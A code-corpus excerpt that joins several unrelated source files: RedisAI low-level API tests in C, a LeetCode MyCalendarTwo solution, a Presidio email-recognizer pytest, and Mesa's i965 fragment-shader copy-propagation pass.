// Test the case of building and running a DAG with LOAD, TENSORGET and MODELRUN ops.
if (testSimpleDAGRun(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "Simple DAG run test failed");
}
// Test the case of building and running a DAG with TENSORSET, SCRIPTRUN and TENSORGET ops.
if (testSimpleDAGRun2(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "Simple DAG run2 test failed");
}
// Test the case of building the same DAG as in previous test, but when this time it should
// return with an error.
if (testSimpleDAGRun2Error(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "Simple DAG run2 error test failed");
}
// Test the case of building DAG ops from string.
if (testBuildDAGFromString(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "Build DAG from string test failed");
}
return RedisModule_ReplyWithSimpleString(ctx, "DAG run success");
}
int RAI_llapi_DAG_resnet(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
if (argc > 1) {
RedisModule_WrongArity(ctx);
return REDISMODULE_OK;
}
if (testDAGResnet(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "DAG resnet failed");
}
return RedisModule_ReplyWithSimpleString(ctx, "DAG resnet success");
}
int RAI_llapi_CreateTensor(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
if (argc > 1) {
RedisModule_WrongArity(ctx);
return REDISMODULE_OK;
}
int n_dims = 2;
long long dims[] = {1, 4};
// Try to create a tensor with a non-supported data type.
RAI_Tensor *t = RedisAI_TensorCreate("INVALID", dims, n_dims);
if (t != NULL) {
return RedisModule_ReplyWithSimpleString(ctx,
"invalid data type tensor create test failed");
}
// create an empty tensor and validate that in contains zeros
t = RedisAI_TensorCreate("INT8", dims, n_dims);
int8_t expected_blob[4] = {0};
if (t == NULL || RedisAI_TensorLength(t) != dims[0] * dims[1] ||
memcmp(RedisAI_TensorData(t), expected_blob, 4) != 0) {
return RedisModule_ReplyWithSimpleString(ctx, "empty tensor create test failed");
}
RedisAI_TensorFree(t);
// create an invalid bool tensor
t = RedisAI_TensorCreate("BOOL", dims, n_dims);
uint8_t data_blob[4] = {2, 0, 0, 0}; // This value is invalid for bool type
if (RedisAI_TensorSetData(t, (const char *)data_blob, 4) != 0) {
return RedisModule_ReplyWithSimpleString(ctx, "invalid bool tensor data set test failed");
}
RedisAI_TensorFree(t);
// This should fail since the blob contains only one null-terminated string, while the tensor's
// len should be 4.
RAI_Tensor *t1 = RedisAI_TensorCreate("STRING", dims, n_dims);
const char *data_blob1 = "only one string\0";
if (RedisAI_TensorSetData(t1, data_blob1, strlen(data_blob1)) != 0) {
return RedisModule_ReplyWithSimpleString(ctx, "invalid string tensor data set test failed");
}
RedisAI_TensorFree(t1);
return RedisModule_ReplyWithSimpleString(ctx, "create tensor test success");
}
int RAI_llapi_ConcatenateTensors(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
if (argc > 1) {
RedisModule_WrongArity(ctx);
return REDISMODULE_OK;
}
int n_dims = 2;
long long dims[] = {1, 4};
// test concatenation of string tensors
RAI_Tensor *t1 = RedisAI_TensorCreate("STRING", dims, n_dims);
const char *data_blob1 = "first\0second\0third\0forth\0";
size_t len_data_blob1 = 25;
if (RedisAI_TensorSetData(t1, data_blob1, len_data_blob1) != 1) {
return RedisModule_ReplyWithSimpleString(ctx, "string tensor data set test failed");
}
// the second tensor's shape is [2,4], while the previous shape was [1,4]
dims[0] = 2;
const char *data_blob2 = "A\0B\0C\0D\0E\0F\0G\0H\0";
size_t len_data_blob2 = 16;
RAI_Tensor *t2 = RedisAI_TensorCreate("STRING", dims, n_dims);
if (RedisAI_TensorSetData(t2, data_blob2, len_data_blob2) != 1) {
return RedisModule_ReplyWithSimpleString(ctx, "string tensor data set test failed");
}
RAI_Tensor *tensors[] = {t1, t2};
RAI_Tensor *batched_tensor = RedisAI_TensorCreateByConcatenatingTensors(tensors, 2);
RedisAI_TensorFree(t1);
RedisAI_TensorFree(t2);
const char *expected_batched_data = "first\0second\0third\0forth\0A\0B\0C\0D\0E\0F\0G\0H\0";
size_t expected_batched_data_len = len_data_blob1 + len_data_blob2;
if (batched_tensor == NULL || RedisAI_TensorNumDims(batched_tensor) != 2 ||
RedisAI_TensorDim(batched_tensor, 0) != 3 || RedisAI_TensorDim(batched_tensor, 1) != 4 ||
memcmp(expected_batched_data, RedisAI_TensorData(batched_tensor),
expected_batched_data_len) != 0) {
return RedisModule_ReplyWithSimpleString(ctx, "string tensor concatenation test failed");
}
RedisAI_TensorFree(batched_tensor);
return RedisModule_ReplyWithSimpleString(ctx, "concatenate tensors test success");
}
int RAI_llapi_SliceTensor(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
if (argc > 1) {
RedisModule_WrongArity(ctx);
return REDISMODULE_OK;
}
int n_dims = 2;
long long dims[] = {3, 4};
RAI_Tensor *batched_tensor = RedisAI_TensorCreate("STRING", dims, n_dims);
const char *batched_data = "first\0second\0third\0forth\0A\0B\0C\0D\0E\0F\0G\0H\0";
size_t len_data_batch1 = 25;
size_t len_data_batch2 = 16;
RedisAI_TensorSetData(batched_tensor, batched_data, len_data_batch1 + len_data_batch2);
// test slicing string tensors
RAI_Tensor *t1 = RedisAI_TensorCreateBySlicingTensor(batched_tensor, 0, 1);
RAI_Tensor *t2 = RedisAI_TensorCreateBySlicingTensor(batched_tensor, 1, 2);
RedisAI_TensorFree(batched_tensor);
if (t1 == NULL || RedisAI_TensorNumDims(t1) != 2 || RedisAI_TensorDim(t1, 0) != 1 ||
RedisAI_TensorDim(t1, 1) != 4 ||
memcmp(batched_data, RedisAI_TensorData(t1), len_data_batch1) != 0) {
return RedisModule_ReplyWithSimpleString(ctx, "string tensor slicing test failed");
}
if (t2 == NULL || RedisAI_TensorNumDims(t2) != 2 || RedisAI_TensorDim(t2, 0) != 2 ||
RedisAI_TensorDim(t2, 1) != 4 ||
memcmp(batched_data + len_data_batch1, RedisAI_TensorData(t2), len_data_batch2) != 0) {
return RedisModule_ReplyWithSimpleString(ctx, "string tensor slicing test failed");
}
RedisAI_TensorFree(t1);
RedisAI_TensorFree(t2);
return RedisModule_ReplyWithSimpleString(ctx, "slice tensor test success");
}
int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
REDISMODULE_NOT_USED(argc);
if (RedisModule_Init(ctx, "RAI_llapi", 1, REDISMODULE_APIVER_1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisAI_Initialize(ctx) != REDISMODULE_OK)
RedisModule_Log(ctx, "warning",
"could not initialize RedisAI api, running without AI support.");
if (RedisModule_CreateCommand(ctx, "RAI_llapi.basic_check", RAI_llapi_basic_check, "", 0, 0,
0) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "RAI_llapi.modelRun", RAI_llapi_modelRun, "", 0, 0, 0) ==
REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "RAI_llapi.scriptRun", RAI_llapi_scriptRun, "", 0, 0, 0) ==
REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "RAI_llapi.DAGRun", RAI_llapi_DAGRun, "", 0, 0, 0) ==
REDISMODULE_ERR) {
return REDISMODULE_ERR;
}
if (RedisModule_CreateCommand(ctx, "RAI_llapi.DAG_resnet", RAI_llapi_DAG_resnet, "", 0, 0, 0) ==
REDISMODULE_ERR) {
return REDISMODULE_ERR;
}
if (RedisModule_CreateCommand(ctx, "RAI_llapi.CreateTensor", RAI_llapi_CreateTensor, "", 0, 0,
0) == REDISMODULE_ERR) {
return REDISMODULE_ERR;
}
if (RedisModule_CreateCommand(ctx, "RAI_llapi.ConcatenateTensors", RAI_llapi_ConcatenateTensors,
"", 0, 0, 0) == REDISMODULE_ERR) {
return REDISMODULE_ERR;
}
if (RedisModule_CreateCommand(ctx, "RAI_llapi.SliceTensor", RAI_llapi_SliceTensor, "", 0, 0,
0) == REDISMODULE_ERR) {
return REDISMODULE_ERR;
}
return REDISMODULE_OK;
}
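/*
 * Hedged usage sketch (not part of the original file): with this module
 * loaded next to RedisAI, and the keys it expects (m{1}, a{1}, b{1},
 * myscript{1}) populated, the test commands can be driven from redis-cli:
 *
 *   redis-cli RAI_llapi.basic_check   -> "OK"
 *   redis-cli RAI_llapi.modelRun      -> "Async run success"
 *
 * The replies shown are the success strings used by the handlers above.
 */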
| 8,107 |
713 | class MyCalendarTwo(object):
    def __init__(self):
        self.bookings = []
        self.overlaps = []
    def book(self, start, end):
        """
        :type start: int
        :type end: int
        :rtype: bool
        """
        # A triple booking can only happen inside an interval that is already
        # double-booked, so reject any event intersecting a known overlap.
        # (The interval check "start < ed and end > st" also catches full
        # containment, which the earlier per-booking count missed.)
        for st, ed in self.overlaps:
            if start < ed and end > st:
                return False
        # Otherwise record the double-booked region created with each
        # existing booking, then accept the event.
        for st, ed in self.bookings:
            if start < ed and end > st:
                self.overlaps.append((max(start, st), min(end, ed)))
        self.bookings.append((start, end))
        return True
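# Worked example (the sequence from LeetCode 731's sample; expected returns
# assume the corrected implementation above):
# cal = MyCalendarTwo()
# cal.book(10, 20)  # True
# cal.book(50, 60)  # True
# cal.book(10, 40)  # True  -- a double booking is allowed
# cal.book(5, 15)   # False -- would triple-book [10, 15)
# cal.book(5, 10)   # True
# cal.book(25, 55)  # True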
# Your MyCalendarTwo object will be instantiated and called as such:
# obj = MyCalendarTwo()
# param_1 = obj.book(start,end) | 327 |
1,408 | <gh_stars>1000+
import pytest
from tests import assert_result
from presidio_analyzer.predefined_recognizers import EmailRecognizer
@pytest.fixture(scope="module")
def recognizer():
return EmailRecognizer()
@pytest.fixture(scope="module")
def entities():
return ["EMAIL_ADDRESS"]
@pytest.mark.parametrize(
"text, expected_len, expected_positions",
[
# fmt: off
# valid email addresses
("<EMAIL>", 1, ((0, 18),),),
("my email address is <EMAIL>", 1, ((20, 38),),),
("try one of these emails: <EMAIL> or <EMAIL>",
2,
((25, 43), (47, 72),),),
# invalid email address
("my email is <EMAIL>@presidio.", 0, ()),
# fmt: on
],
)
def test_when_all_email_addresses_then_succeed(
text, expected_len, expected_positions, recognizer, entities, max_score
):
results = recognizer.analyze(text, entities)
assert len(results) == expected_len
for res, (st_pos, fn_pos) in zip(results, expected_positions):
assert_result(res, entities[0], st_pos, fn_pos, max_score)
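# Hedged usage sketch (not part of the original test): the recognizer can also
# be called directly outside pytest; entity_type is part of presidio-analyzer's
# public RecognizerResult API.
#
#   recognizer = EmailRecognizer()
#   results = recognizer.analyze("reach me at user@example.com", ["EMAIL_ADDRESS"])
#   assert results and results[0].entity_type == "EMAIL_ADDRESS"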
| 450 |
2,151 | /*
* Copyright © 2012 Intel Corporation
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
* FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
* IN THE SOFTWARE.
*/
#include "brw_fs.h"
#include "brw_fs_cfg.h"
namespace { /* avoid conflict with opt_copy_propagation_elements */
struct acp_entry : public exec_node {
fs_reg dst;
fs_reg src;
};
}
bool
fs_visitor::try_copy_propagate(fs_inst *inst, int arg, acp_entry *entry)
{
if (inst->src[arg].file != entry->dst.file ||
inst->src[arg].reg != entry->dst.reg ||
inst->src[arg].reg_offset != entry->dst.reg_offset) {
return false;
}
/* See resolve_ud_negate() and comment in brw_fs_emit.cpp. */
if (inst->conditional_mod &&
inst->src[arg].type == BRW_REGISTER_TYPE_UD &&
entry->src.negate)
return false;
bool has_source_modifiers = entry->src.abs || entry->src.negate;
if (intel->gen == 6 && inst->is_math() &&
(has_source_modifiers || entry->src.file == UNIFORM))
return false;
inst->src[arg].file = entry->src.file;
inst->src[arg].reg = entry->src.reg;
inst->src[arg].reg_offset = entry->src.reg_offset;
if (!inst->src[arg].abs) {
inst->src[arg].abs = entry->src.abs;
inst->src[arg].negate ^= entry->src.negate;
}
return true;
}
/** @file brw_fs_copy_propagation.cpp
*
* Support for local copy propagation by walking the list of instructions
* and maintaining the ACP table of available copies for propagation.
*
 * See Muchnick's Advanced Compiler Design and Implementation, section
* 12.5 (p356).
*/
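/* Worked example (hypothetical IR, added for illustration; the register
 * numbers are not taken from any real shader):
 *
 *    MOV  g4, g2          adds the entry (dst: g4, src: g2) to the ACP
 *    ADD  g5, g4, g3      reading g4 matches the entry, so it is rewritten to
 *    ADD  g5, g2, g3
 *
 * A later write to either g2 or g4 kills the entry, since the copy is no
 * longer available.
 */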
/* Walks a basic block and does copy propagation on it using the acp
* list.
*/
bool
fs_visitor::opt_copy_propagate_local(void *mem_ctx,
fs_bblock *block, exec_list *acp)
{
bool progress = false;
for (fs_inst *inst = block->start;
inst != block->end->next;
inst = (fs_inst *)inst->next) {
/* Try propagating into this instruction. */
foreach_list(entry_node, acp) {
acp_entry *entry = (acp_entry *)entry_node;
for (int i = 0; i < 3; i++) {
if (try_copy_propagate(inst, i, entry))
progress = true;
}
}
/* kill the destination from the ACP */
if (inst->dst.file == GRF) {
foreach_list_safe(entry_node, acp) {
acp_entry *entry = (acp_entry *)entry_node;
if (inst->overwrites_reg(entry->dst) ||
inst->overwrites_reg(entry->src)) {
entry->remove();
}
}
}
/* If this instruction is a raw copy, add it to the ACP. */
if (inst->opcode == BRW_OPCODE_MOV &&
inst->dst.file == GRF &&
((inst->src[0].file == GRF &&
(inst->src[0].reg != inst->dst.reg ||
inst->src[0].reg_offset != inst->dst.reg_offset)) ||
inst->src[0].file == UNIFORM) &&
inst->src[0].type == inst->dst.type &&
!inst->saturate &&
!inst->predicated &&
!inst->force_uncompressed &&
!inst->force_sechalf &&
inst->src[0].smear == -1) {
acp_entry *entry = ralloc(mem_ctx, acp_entry);
entry->dst = inst->dst;
entry->src = inst->src[0];
acp->push_tail(entry);
}
}
return progress;
}
bool
fs_visitor::opt_copy_propagate()
{
bool progress = false;
void *mem_ctx = ralloc_context(this->mem_ctx);
fs_cfg cfg(this);
for (int b = 0; b < cfg.num_blocks; b++) {
fs_bblock *block = cfg.blocks[b];
exec_list acp;
progress = opt_copy_propagate_local(mem_ctx, block, &acp) || progress;
}
ralloc_free(mem_ctx);
if (progress)
live_intervals_valid = false;
return progress;
}
| 1,704 |